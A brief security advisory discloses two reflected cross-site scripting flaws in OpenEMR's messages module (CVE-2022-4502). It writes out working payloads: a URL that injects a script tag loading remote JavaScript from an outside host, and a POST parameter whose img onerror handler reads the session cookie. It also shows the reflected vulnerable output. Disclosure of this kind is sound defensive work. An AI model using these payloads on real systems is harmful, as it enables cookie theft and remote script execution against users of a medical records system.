OpenEMR – Multiple Reflected Cross-Site Scripting in Messages Module (CVE-2022-4502)
Summary
The messages module was affected by two instances of Cross-Site Scripting (XSS). The first one involved the “stage” parameter using “setup” functionality.
The second instance affected the parameter called “parameter” sent within post data while a message is being saved. The payload was reflected in the response that was set as HTML content-type.
Impact
Description
The first instance affects the messages.php file using this parameters:
http://openemr.vuln/interface/main/messages/messages.php?go=setup&stage=%3Cscript%20src=//xt.rs%3E%3C/script%3E
The web page generated the following unparsed code that lead to a remote JavaScript being executed in the context of the user browser:
<br />
<span class=’title’>
<script src=//xt.rs></script> Warning: This is not a valid request.
</span>

The second instance affected the message save functionality using “process” action, as can be shown below:
Host: xxxxxxx
(…snip..)
parameter={“xss”:”<img%20src=x%20onerror=alert(document.cookie)>”}
(…snip…)
Content-Type: text/html; charset=utf-8
{“xss”:”<img src=x onerror=alert(document.cookie)>“}
